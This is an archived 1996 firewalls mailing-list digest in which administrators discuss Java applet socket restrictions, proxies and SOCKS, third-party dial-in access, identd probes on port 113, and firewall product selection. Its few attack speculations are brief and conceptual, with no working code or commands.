Date: Fri, 9 Feb 1996 11:33:06 GMT
To: firewalls@greatcircle.com
Subject: Advice please - doing without an inner router on a secured subnet

From: "Donna O'Connell"
Date: 9 Feb 96 8:24:42
To: firewalls
Subject: security checks

I am looking for a list or a good web site discussing security audits of networks, firewalls and systems. Does anyone out there have some good info?
Thanks,
Donna O'Connell
NYNEX

From firewalls-owner Fri Feb 9 06:06:36 1996
Date: Fri, 9 Feb 1996 08:49:26 -0500 (EST)
From: "Paul D. Robertson"
To: Jeff Murphy
cc: firewalls@GreatCircle.COM
Subject: Re: JAVA security problem ?

On Fri, 9 Feb 1996, Jeff Murphy wrote:

> (as far as i know) in the current incarnation of java (beta) that is
> available via the netscape browser.. applets are restricted to opening
> socket connections back to the server from whence they came only. i think
> this would foil an applets attempt to open a socket to your screening
> router (presumably in an attempt to muck with its configuration).

Any idea on how this works in a proxy environment? I'd expect it to attempt to open the socket on the proxy, since the proxy doesn't know about Java. That's not a good thing at all. I also wonder how the Sun implementation handles this.

Paul.
-----------------------------------------------------------------------------
Paul D. Robertson      "My statements in this message are personal opinions
proberts@clark.net      which may have no basis whatsoever in fact."
PSB#9280

From firewalls-owner Fri Feb 9 06:11:54 1996
Date: Fri, 9 Feb 1996 08:57:58 -0500 (EST)
From: Rabid Wombat
To: Russ
cc: "'Dick_Wall@stratus.com'", "'Firewalls'"
Subject: RE: Non-company Access ??

On Thu, 8 Feb 1996, Russ wrote:

> If it really is such a large requirement, what about setting up separate
> modems to handle specific requirements. For example, Modem A is allowed to
> go to Host A for Protocols X,Y, and Z ? Modem B goes to Host B for
> Protocols X, Y, and Z ? and so on.
>
> Cheers,
> Russ Cooper - Senior Consultant - Internet
> SHL/Computer Innovations - Consulting Services
> "Do you have the vision to see my future as I projected it?"

You might want to look into using a terminal server and setting up account restrictions that way. I've used the Livingston Portmaster for this purpose and been happy with the results. Where you set it up will depend on your requirements, but a separate segment off the screening router should be considered. Block access from "outside" to the term server based on addresses, and block access to outside from the term server based on addresses at the screening router. Most term servers can also be set up for dial-back, and you could add encryption-modems if really paranoid. Also - look into Radius in conjunction with the Livingston terminal server.
We're planning on implementing that approach at a site with dial-in requirements similar to what you've described (thanks to all on the list who gave positive feedback on their experiences with this). Depending on what you're passing through from the term server, you may need to put up a second firewall, one for access to outside and one just to screen the TS, instead of what's below:

                                    |-------------|
  outside    |--------|-------------| term server |
  -----------| router |             |-------------|
             |----|---|
                  |
             |----------|
             | firewall |------------ inside
             |----------|

Comments? Anyone see weakness with the above? Has anyone come up with a better alternative?

- R.W.

From firewalls-owner Fri Feb 9 06:39:19 1996
Date: 9 Feb 1996 09:09:45 U
From: "Ashley Miller"
Subject: Comprehensive FAQ on f-wall
To: "Firewalls"

All:

Does anyone know of any comprehensive FAQ's on the basics of firewall installation? I realize that the devil is in the details (per vendor or individual firewall) but I'm really interested in finding a resource which could guide me through all of the issues I will encounter and that defines terms in a way that mgmt understands.

Thanks,
Ashley Miller

From firewalls-owner Fri Feb 9 06:55:44 1996
Date: Fri, 9 Feb 1996 09:26:05 -0500 (EST)
From: Rabid Wombat
To: H Barnett
cc: firewalls
Subject: Re: Re[2]: routing table go through firewall ?

> The Novell MPR software can be installed on the Server to provide routing
> of the TCP/IP traffic. This will add overhead to the servers and the
> filtering on the router leaves a lot to be desired, however your
> packets will pass. MPR works on 3.x and 4.x servers (not 2.x)

You can pass IP packets through with IP Forward=Yes. MPR will add more features, but you can get by without it.

From firewalls-owner Fri Feb 9 07:00:13 1996
Date: Fri, 09 Feb 1996 09:44:29 -0500
From: "Douglas M. Todd, Jr."
Organization: fc.com
To: Firewalls@GreatCircle.COM
Subject: Would anyone know how to route www.foobar.com

from an active DNS server? Where in the named file & what format is it in?

thanks-
==DMT>
--
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>Douglas M. Todd, Jr.
fc.com, Inc.
One Federal Street BLD 102
Springfield, MA 01105
PHN: 413-733-7333
FAX: 413-733-7725
Email: Doug@fc.com or Bunyan@msn.com

From firewalls-owner Fri Feb 9 07:09:00 1996
Date: Fri, 09 Feb 1996 10:09:53 -0500
From: Adam Jack
Organization: CSK/Micrognosis Inc.
To: "Paul D. Robertson"
Cc: firewalls@greatcircle.com
Subject: Re: JAVA security problem ?

Paul D. Robertson wrote:
>
> > [...] applets are restricted to opening
> > socket connections back to the server from whence they came only.
>
> Any idea on how this works in a proxy environment? I'd expect it to
> attempt to open the socket on the proxy, [...]

Java socket support has no concept of, or handling for, a proxy. If an applet tries to connect home from within such an environment it will fail for the same reasons that any other IP connect would fail. It makes writing such an applet next to pointless if it is intended for internet (as opposed to intranet) activities.

Adam
--
+1-203-730-5437 | http://www.micrognosis.com/~ajack/index.html
ajack@corp.micrognosis.com -> ajack@netcom.com -> ajack@?.???

From firewalls-owner Fri Feb 9 07:23:59 1996
Date: Fri, 9 Feb 1996 09:16:19 -0600
From: Ken Hardy
To: proberts@clark.net
Subject: Re: JAVA security problem ?
Cc: firewalls@greatcircle.com

I trow "Paul D. Robertson" spake thusly in sooth:

>> (as far as i know) in the current incarnation of java (beta) that is
>> available via the netscape browser.. applets are restricted to opening
>> socket connections back to the server from whence they came only.
>> i think
>> this would foil an applets attempt to open a socket to your screening
>> router (presumably in an attempt to muck with its configuration).
>
>Any idea on how this works in a proxy environment? I'd expect it to
>attempt to open the socket on the proxy, since the proxy doesn't know
>about Java. That's not a good thing at all. I also wonder how the Sun
>implementation handles this.

The most straightforward way I see of getting this to work through a bastion host is to use Socks. Netscape has a setting for Socks configuration.

Interesting thought: I don't see a lot of damage possible if the applet can _only_ talk to the originating host and the GUI components of the browser, but it would be a neat way to steal CPU cycles for a massive parallel factoring project, e.g.; get a large portion of the worldwide internet community to run your extremely useful and seemingly harmless applet, and have it do a little factoring on the side, sending the results back over its safe little socket. How long does it take a million machines to crack a 40-bit RC4 password, albeit not with machine code? :-O

- KH

From firewalls-owner Fri Feb 9 07:38:50 1996
Date: Fri, 9 Feb 1996 10:18:29 -0500 (EST)
From: "Paul D. Robertson"
To: Ken Hardy
cc: firewalls@greatcircle.com
Subject: Re: JAVA security problem ?

On Fri, 9 Feb 1996, Ken Hardy wrote:

> I trow "Paul D. Robertson" spake thusly in sooth:
>
> >> (as far as i know) in the current incarnation of java (beta) that is
> >> available via the netscape browser.. applets are restricted to opening
> >> socket connections back to the server from whence they came only. i think
> >> this would foil an applets attempt to open a socket to your screening
> >> router (presumably in an attempt to muck with its configuration).
> >
> >Any idea on how this works in a proxy environment? I'd expect it to
> >attempt to open the socket on the proxy, since the proxy doesn't know
> >about Java. That's not a good thing at all. I also wonder how the Sun
> >implementation handles this.
>
> The most straightforward way I see of getting this to work through a
> bastion host is to use Socks. Netscape has a setting for Socks
> configuration.
>

I haven't used Socks, but doesn't this mean that any application protocol can talk out over that connection? I don't want my users running anything that hasn't been approved. With a proxy, at least I'm assured that it's HTTP that's being spoken.

> Interesting thought: I don't see a lot of damage possible if the applet
> can _only_ talk to the originating host and the GUI components of the

Depends on what's running on the host, and what it's connected to. I can imagine lots of bad things, which would take evil code, but then that seems to be a matter of putting "click here" on a page now-a-days.

Your Paranoia May Vary

Paul.
-----------------------------------------------------------------------------
Paul D. Robertson      "My statements in this message are personal opinions
proberts@clark.net      which may have no basis whatsoever in fact."
PSB#9280 From firewalls-owner Fri Feb 9 07:58:47 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA15563 for firewalls-outgoing; Fri, 9 Feb 1996 07:50:10 -0800 (PST) Received: from gw3.att.com (gw4.att.com [204.179.186.34]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA15558 for ; Fri, 9 Feb 1996 07:50:06 -0800 (PST) Received: from vodka.sse.att.com by ig4.att.att.com id AA11682; Fri, 9 Feb 96 10:42:04 EST Message-Id: <9602091542.AA11682@ig4.att.att.com> From: mdr@vodka.sse.att.com Subject: Re: JAVA security problem ? To: jcmurphy@smurfland.cit.buffalo.edu (Jeff Murphy) Date: Fri, 9 Feb 1996 10:50:36 -0500 (EST) Cc: Firewalls@greatcircle.com In-Reply-To: <199602090828.DAA28812@smurfland.cit.buffalo.edu> from "Jeff Murphy" at Feb 9, 96 03:28:39 am X-Mailer: ELM [version 2.4 PL23-upenn2.7] Mime-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > >There exist a possibility for a Java applet to open up a outbound socket > >connection (I have not verified this myself) from the Browser. If the > > > > [...] > > > >Examples that spring to my mind is to attack a screening router from > >within a trusted network, launch rsh commands that otherwise would not > > (as far as i know) in the current incarnation of java (beta) that is > available via the netscape browser.. applets are restricted to opening > socket connections back to the server from whence they came only. i think > this would foil an applets attempt to open a socket to your screening > router (presumably in an attempt to muck with its configuration). > > An how do they know from whence they came? Do I smell an IP spoofing attack? 
Mark Riggins Secure Systems Engineering AT&T Bell Labs From firewalls-owner Fri Feb 9 08:10:33 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA15463 for firewalls-outgoing; Fri, 9 Feb 1996 07:46:40 -0800 (PST) Received: from burdell.cc.gatech.edu (burdell.cc.gatech.edu [130.207.3.207]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id HAA15455 for ; Fri, 9 Feb 1996 07:46:33 -0800 (PST) Received: from gaia.cc.gatech.edu (aleach@gaia.cc.gatech.edu [130.207.3.8]) by burdell.cc.gatech.edu (8.7.1/8.6.9) with ESMTP id KAA12851 for ; Fri, 9 Feb 1996 10:45:42 -0500 (EST) Received: (from aleach@localhost) by gaia.cc.gatech.edu (8.7.1/8.6.9) id KAA17623; Fri, 9 Feb 1996 10:45:40 -0500 (EST) Date: Fri, 9 Feb 1996 10:45:40 -0500 (EST) From: Alfred Grahame Leach To: Firewalls@GreatCircle.COM Subject: firewall product evaluation Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Greetings, I'm a graduate student at Georgia Institute of Technology, taking a network security course. I'm working on a project to choose a firewall product for a medium-sized company, and I was wondering if anyone had any suggestions or leads to find firewall product reviews. Any info would be _really_ appreciated. Feel free to email me directly at: aleach@cc.gatech.edu Thanks, in advance for any help! 
-Al Leach (aleach@cc.gatech.edu)

From firewalls-owner Fri Feb 9 08:24:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA14506 for firewalls-outgoing; Fri, 9 Feb 1996 07:21:42 -0800 (PST) Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA14501 for ; Fri, 9 Feb 1996 07:21:37 -0800 (PST) Received: from pm2-12.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA00325; Fri, 9 Feb 96 10:20:34 -0500 Date: Fri, 9 Feb 96 10:20:34 -0500 Message-Id: <9602091520.AA00325@su1.in.net> X-Sender: frankw@in.net X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@GreatCircle.com From: Frank Willoughby Subject: Re: Non-company Access ?? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Verily at 05:27 PM 2/8/96 -0500, Dick Wall did write:

>In a few words .. can anyone tell me how your companies handle requests
>for third party access to your networks ?

Yes - Delicately. 8^) Politely try to stall them while feverishly searching
for a way which helps them meet their business objectives while meeting
your security standards.

>I get frequent requests to provide PPP or SLIP access to contractors,
>vendors, resellers, distributors, etc. for the purpose of accessing all
>sorts of applications and data bases.
>I also get requests to "open a
>hole in the firewall" to allow these folks to access our facilities.

Stick to your guns and don't grant the requests for PPP/SLIP connections
(this will bypass your firewall) or opening the hole in the firewall. If
you have no choice and absolutely have to open up a hole in your firewall,
at the very least have an encrypted link between the person on the outside
and your firewall. You are still back to the problem that you don't know
what is on the other side of the incoming connection (just how secure is
their network really?).

There are worse things though. Within the last couple of months, I talked
to a rather large ISP (which shall remain nameless), which manages
customers' firewalls by telnetting into the firewall without using an
encrypted link. What is just as bad, they took my word that I had the
approval of the other person to be asking for their firewall access rules.
(Fortunately, I'm one of the good guys & was telling the truth).

>We don't "open holes", but we do register dial access accounts. (Too
>many of them to make me feel comfortable).

All it takes is one dial-in account to clean your clock (particularly with
a SLIP/PPP connection over an ISP).

>Generally, we can't restrict access on a machine basis. The requests
>typically are for access to a broad base of systems. Furthermore, once
>they are on those systems, they are free to then access other machines
>that the filters won't catch.

This is a tough one. I would need to know more details to help you solve
this one - preferably off-line. Feel free to give me a call at the number
below.

>What do you all do ??
>
>Do you allow non-company access ?

Preferably not. When it is unavoidable, isolate the LAN, and only then let
them onto the isolated LAN (with the appropriate NDAs, of course).

>Do you move all the systems to be accessed to a secure LAN ?

Usually. Try to contain the damage as much as possible (before it happens).
>If you allow company A to connect to you, how do you prevent company B
>(which happens to be connected behind company A) from logging onto the
>"A" machine and passing into your net ? (The usual response I get on
>this one is "trust" company A ... they won't let company B do that .. )

IMO, you hit the nail on the head with this one. (Your accurate
understanding of the problem at hand is rather refreshing.) Many people
overlook the problems (& ramifications thereof) that you mentioned. It is
important to get those who are requesting the connection to understand the
business and security risks of what they are proposing. Grab a couple of
recent case histories (GE, Citibank, etc) & point out that what happened to
their organization could also happen to yours. Also, a worm on their
network would also carry over to your network, etc. How do you know that
the person logging into your system doesn't have hacking as their hobby? Or
that the images which aren't being uploaded don't contain trojan horses or
viruses?

>All input is appreciated ...
>
>Dick

The situations you posed are difficult ones. I have handled them before.
If I can help you at all, please feel free to call me.

Best Regards,

Frank

The opinions expressed above are of the author and may not necessarily be
representative of Fortified Networks Inc.

Fortified Networks Inc.
- Management & Information Security Consulting
Phone: (317) 573-0800 - http://www.fortified.com/fortified
Home of the Free Internet Firewall Evaluation Checklist

From firewalls-owner Fri Feb 9 08:38:57 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA17005 for firewalls-outgoing; Fri, 9 Feb 1996 08:23:59 -0800 (PST) Received: from servant ([205.172.9.36]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA17000 for ; Fri, 9 Feb 1996 08:23:54 -0800 (PST) Received: from radiatore.mccaw-stg.com by servant (5.x/SMI-SVR4) id AA05393; Fri, 9 Feb 1996 08:22:57 -0800 Received: by radiatore.mccaw-stg.com (5.x/SMI-SVR4) id AA02154; Fri, 9 Feb 1996 08:22:56 -0800 Date: Fri, 9 Feb 1996 08:22:56 -0800 From: peterg@mccaw-stg.com (Peter Gregory) Message-Id: <9602091622.AA02154@radiatore.mccaw-stg.com> To: goran@btj.se, jcmurphy@smurfland.cit.buffalo.edu Subject: Re: JAVA security problem ? Cc: firewalls@greatcircle.com X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Goran Svensson says:
>There exist a possibility for a Java applet to open up an outbound socket
>connection (I have not verified this myself) from the Browser. If the
>
> [...]
>
>Examples that spring to my mind are to attack a screening router from
>within a trusted network, launch rsh commands that otherwise would not

Jeff Murphy says:
> (as far as i know) in the current incarnation of java (beta) that is
> available via the netscape browser.. applets are restricted to opening
> socket connections back to the server from whence they came only. i think
> this would foil an applet's attempt to open a socket to your screening
> router (presumably in an attempt to muck with its configuration).

Jeff, I think you missed the point. *I* think that what Goran asks is this:
"What if the Java applet and its server (where it came from) are in cahoots
to launch an attack on the client (ie. browsing) system?
Seems to me it would be easy to launch a denial of service attack on the client machine, given that the browser will allow communication (of ANY nature!) between the server and client." Just because the browser allows communication between client and server doesn't mean the communication is going to be friendly. Sure, the Java applet doesn't have access to the filesystem (ie. can't send /etc/passwd back to the original server), but that doesn't mean that harm can't be done. Peter Gregory -- Peter Gregory [NICname PG11] peter.gregory@asix.com Consulting Manager ASIX Inc., 777 108th Ave. NE, Suite 1830, Bellevue WA 98004-5118 From firewalls-owner Fri Feb 9 08:54:07 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA17600 for firewalls-outgoing; Fri, 9 Feb 1996 08:40:35 -0800 (PST) Received: from dialup.oar.net (dialup.oar.net [131.187.1.130]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA17595 for ; Fri, 9 Feb 1996 08:40:29 -0800 (PST) Received: from sun1plus.liebert.com for legg@sun1plus.liebert.com by dialup.oar.net (8.6.10/931123.1402) id LAA13977; Fri, 9 Feb 1996 11:37:27 -0500 Received: from td407 by sun1plus.liebert.com (5.0/SMI-SVR4) id AA25002; Fri, 9 Feb 1996 11:36:04 +0500 Date: Fri, 9 Feb 1996 11:36:03 +0500 Message-Id: <9602091636.AA25002@sun1plus.liebert.com> X-Sender: legg@sun1plus X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@greatcircle.com From: Jim Legg Subject: port 113? 
Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Hi,

I noticed in my log files the following (just a snippet):

2/9-10:42:07-81 tcp 199.18.25.195/3054 -> 206.214.232.100/www 44 syn
2/9-10:42:08-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64)
2/9-10:42:11-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64)
2/9-10:42:17-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64)
2/9-10:42:29-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64)
2/9-10:42:53-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64)
2/9-10:42:55-81 tcp 199.18.25.195/3055 -> 206.214.232.100/www 44 syn
2/9-10:42:55-81 tcp 199.18.25.195/3056 -> 206.214.232.100/www 44 syn
2/9-10:42:56-81 tcp 199.18.25.195/113 <- 206.214.232.100/2005 44 syn !pass(64)
2/9-10:42:56-81 tcp 199.18.25.195/113 <- 206.214.232.100/2007 44 syn !pass(64)
2/9-10:42:58-81 tcp 199.18.25.195/113 <- 206.214.232.100/2005 44 syn !pass(64)
2/9-10:42:59-81 tcp 199.18.25.195/113 <- 206.214.232.100/2007 44 syn !pass(64)
2/9-10:43:04-81 tcp 199.18.25.195/113 <- 206.214.232.100/2005 44 syn !pass(64)
2/9-10:43:05-81 tcp 199.18.25.195/113 <- 206.214.232.100/2007 44 syn !pass(64)

When this web site (nslookup returns Facade.COM) is accessed it tries to
come back to your system on port 113. What is this port? (It's not listed
in my /etc/services)

Thanks.

-jim-
___________________________________________________________________________
Jim Legg    legg@liebert.com (smtp)        Speaking for myself...
            leggj@liebert.com (cc:Mail)
___________________________________________________________________________

From firewalls-owner Fri Feb 9 09:54:37 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA19600 for firewalls-outgoing; Fri, 9 Feb 1996 09:28:41 -0800 (PST) Received: from hawk.hcsc.com (hawk.hcsc.com [204.5.22.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA19592 for ; Fri, 9 Feb 1996 09:28:32 -0800 (PST) Received: from london.hcsc.com by hawk.hcsc.com (5.61/harris-5.1) id AA28593; Fri, 9 Feb 96 12:27:39 -0500 Received: by london.csd.harris.com (5.61/HARRIS-4.0) id AA12653; Fri, 9 Feb 96 17:27:40 GMT From: jon@london.hcsc.com (Jon Shallow) Message-Id: <9602091727.AA12653@london.csd.harris.com> Subject: Re: Product selection To: peter@nmti.com Date: Fri, 9 Feb 96 17:27:39 GMT Cc: jon@london.hcsc.com, firewalls@GreatCircle.COM In-Reply-To: <9602081950.AA15314@sonic.nmti.com.nmti.com>; from "Peter da Silva" at Feb 8, 96 1:50 pm X-Mailer: ELM [version 2.2 PL10] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

>
> > Assume that sendmail was installed badly, and is still running as a 'root'
> > process. A 'feature' is found where the incoming mail session is able to
> > take control.
> >
> > This mail session at worst can only corrupt the NETWORK domain, in
> > particular, only the Virtual Address Space of this mail session.
>
> In particular, it can open new network connections (otherwise it can't
> forward mail!). For example, a proxy TCP connection between phreak.net
> and exploitable.victim.com.
>

Depends on how the firewall is set up. A firewall worth its salt these days
will have both dynamic (state-driven) packet filtering and proxies. The
proxy could try to establish another TCP connection, but this connection
would have to be permitted by the packet filtering.
For example, on the Harris CyberGuard, to enable communications through a
proxy would require a single packet filter rule of the form:-

    proxy telnet outside_network inside_network

All traffic that is not 'telnet traffic going between outside_network and
inside_network' is denied. Any telnet traffic initiated by outside_host to
inside_host will always be forced to go through the telnet proxy for
authentication etc. To put it another way, 'ip_forwarding is on', but the
packets are ip_forwarded through the proxy.

If the proxy (telnet in this case) on the firewall tries to open up any IP
connection other than to destination host/telnet, it will be denied with
alarms being set off. Unless the proxy has overwritten the stack with new
'socket' code, any new executable created by the proxy will be unable to
make any network connections.

Regards

Jon
--
Jon Shallow, Harris Computer Systems Corporation
Jon.Shallow@mail.hcsc.com
Tel +44 (0) 1276 686886  Fax +44 (0) 1276 678733

From firewalls-owner Fri Feb 9 10:39:19 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA20395 for firewalls-outgoing; Fri, 9 Feb 1996 09:44:57 -0800 (PST) Received: from svcs1.digex.net (svcs1.digex.net [204.91.197.224]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA20382 for ; Fri, 9 Feb 1996 09:44:52 -0800 (PST) Received: from fred.digex.net (fred.digex.net [164.109.213.78]) by svcs1.digex.net (8.6.12/8.6.12) with SMTP id MAA03973 for ; Fri, 9 Feb 1996 12:44:06 -0500 Message-ID: <311B874F.5827@access.digex.net> Date: Fri, 09 Feb 1996 12:41:35 -0500 From: "Eliot T.
Ware" X-Mailer: Mozilla 2.0GoldB1 (Win95; I) MIME-Version: 1.0 To: Firewall ListServer Subject: NetWare LAN Security using IP-IPX Gateway Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am new to the entire subject of firewalls and am looking for comments on the relative security of IPX-based assets on an IPX only LAN which is connected to an IP network (Internet mainly) via an IP-IPX gateway. Is there a way to access the IPX-based assets from the IP side and do harm? If so, how (either theory or actual methods) and can the risk be further mitigated? This information will be used to assist us in determining the relative risks. Thanks for your time. -Eliot -- Eliot T. Ware, CNE voice: (202) 622-1302 Global Systems Architect fax: (202) 622-2582 Department of the Treasury (UNIBAND) preferred: etware@access.digex.net alternate: eliot.ware@treas.sprint.com From firewalls-owner Fri Feb 9 10:54:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA22967 for firewalls-outgoing; Fri, 9 Feb 1996 10:50:47 -0800 (PST) Received: from mclo20 ([164.167.86.20]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA22962 for ; Fri, 9 Feb 1996 10:50:37 -0800 (PST) Received: from [164.167.86.100] by mclo20.med.navy.mil (SMTPD32-95.07.27) id A875116016E; Fri Feb 09 13:54:45 1996 Message-ID: <311B960A.1949@mclo10.med.navy.mil> Date: Fri, 09 Feb 1996 13:44:26 -0500 From: Bob Resino Organization: MCLO, HSO, Norfolk, VA (US Navy) X-Mailer: Mozilla 2.0b5 (Win95; I) MIME-Version: 1.0 To: Jim Legg CC: firewalls@GreatCircle.COM Subject: Re: port 113? 
References: <9602091636.AA25002@sun1plus.liebert.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Jim Legg wrote:
>
> Hi,
>
> I noticed in my log files the following (just a snippet):
>
> 2/9-10:42:07-81 tcp 199.18.25.195/3054 -> 206.214.232.100/www 44 syn
> 2/9-10:42:08-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64)
> 2/9-10:42:11-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64)
> 2/9-10:42:17-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64)
> 2/9-10:42:29-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64)
> 2/9-10:42:53-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64)
> 2/9-10:42:55-81 tcp 199.18.25.195/3055 -> 206.214.232.100/www 44 syn
> 2/9-10:42:55-81 tcp 199.18.25.195/3056 -> 206.214.232.100/www 44 syn
> 2/9-10:42:56-81 tcp 199.18.25.195/113 <- 206.214.232.100/2005 44 syn !pass(64)
> 2/9-10:42:56-81 tcp 199.18.25.195/113 <- 206.214.232.100/2007 44 syn !pass(64)
> 2/9-10:42:58-81 tcp 199.18.25.195/113 <- 206.214.232.100/2005 44 syn !pass(64)
> 2/9-10:42:59-81 tcp 199.18.25.195/113 <- 206.214.232.100/2007 44 syn !pass(64)
> 2/9-10:43:04-81 tcp 199.18.25.195/113 <- 206.214.232.100/2005 44 syn !pass(64)
> 2/9-10:43:05-81 tcp 199.18.25.195/113 <- 206.214.232.100/2007 44 syn !pass(64)
>
> When this web site (nslookup returns Facade.COM) is accessed it tries to come
> back to your system on port 113. What is this port? (It's not listed in my
> /etc/services)
>
> Thanks.
>
> -jim-

RFC 1700 lists TCP 113 and UDP 113 as the authentication service. RFC 1409
introduces a list of authentication types.
Bob Resino From firewalls-owner Fri Feb 9 11:13:34 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA23178 for firewalls-outgoing; Fri, 9 Feb 1996 10:57:17 -0800 (PST) Received: from relay2.UU.NET (relay2.UU.NET [192.48.96.7]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id KAA23173 for ; Fri, 9 Feb 1996 10:57:10 -0800 (PST) Received: from cixgate by relay2.UU.NET with SMTP id QQacfb06293; Fri, 9 Feb 1996 13:54:13 -0500 (EST) Received: from manzanita.DEV.3Com.COM.noname ([139.87.180.206]) by cixgate (4.1/SMI-4.1/3com-cixgate-GCA-931027-01) id AA12477; Fri, 9 Feb 96 11:03:24 PST Received: by manzanita.DEV.3Com.COM.noname (4.1/SMI-4.1) id AA02724; Fri, 9 Feb 96 10:48:01 PST Date: Fri, 9 Feb 96 10:48:01 PST From: bobk@manzanita.DEV.3Com.COM (Bob Konigsberg) Message-Id: <9602091848.AA02724@manzanita.DEV.3Com.COM.noname> To: firewalls@greatcircle.com, Dick_Wall@stratus.com Subject: Re: Non-company Access ?? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk You can set up what we refer to as a vendor network. It has (for dial up users) both access control, and router filtering to restrict what they can do once they are in. This can also be done with X.25, Frame Relay, leased lines, whatever. IP is generally easier to control than IPX, but both are workable with careful filtering. 
BobK From firewalls-owner Fri Feb 9 11:27:45 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA21628 for firewalls-outgoing; Fri, 9 Feb 1996 10:19:27 -0800 (PST) Received: from smurfland.cit.buffalo.edu (smurfland.cit.buffalo.edu [128.205.10.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id KAA21623 for ; Fri, 9 Feb 1996 10:19:20 -0800 (PST) Received: (jcmurphy@localhost) by smurfland.cit.buffalo.edu (8.7.3/8.6.4) id NAA15401; Fri, 9 Feb 1996 13:18:32 -0500 (EST) From: Jeff Murphy Message-Id: <199602091818.NAA15401@smurfland.cit.buffalo.edu> Subject: Re: JAVA security problem ? To: ken@bridge.com (Ken Hardy) Date: Fri, 9 Feb 1996 13:18:32 -0500 (EST) Cc: firewalls@greatcircle.com In-Reply-To: <199602091516.AA02496@ignatz.bridge.com> from "Ken Hardy" at Feb 9, 96 09:16:19 am X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >The most straightforward way I see of getting this to work through a >bastion host is to use Socks. Netscape has a setting for Socks >configuration. from the java beta3 api doc: public final class Socket extends Object This is the basic socket class. It is currently 'SOCKSified' so if you have SOCKS_HOST and SOCKS_PORT set, and the address cannot be connected to locally, then we try going through sockd. >million machines to crack a 40-bit RC4 password, albeit not with >machine code? :-O very interesting ;) how many machines participated in that RSA factorization that went on a few years back? i think it took them 10 or so months to do it? i can't remember all of the details.. From firewalls-owner Fri Feb 9 11:44:00 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA22255 for firewalls-outgoing; Fri, 9 Feb 1996 10:34:50 -0800 (PST) Received: from server. 
([198.199.198.20]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA22250 for ; Fri, 9 Feb 1996 10:34:45 -0800 (PST) Received: from DMT.fc.com ([198.199.198.164]) by server. (8.6.12/8.6.12) with SMTP id PAA13962 for ; Fri, 9 Feb 1996 15:08:25 -0500 Message-ID: <311B939B.32FC@fc.com> Date: Fri, 09 Feb 1996 13:34:03 -0500 From: "Douglas M. Todd, Jr." Organization: fc.com X-Mailer: Mozilla 2.0GoldB1 (Win95; I) MIME-Version: 1.0 To: Firewalls@GreatCircle.COM Subject: Would anyone know how to route www.foobar.COM Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

to foobar.com on a DNS server? Where in the named file & what format is it
in?

==DMT>
--
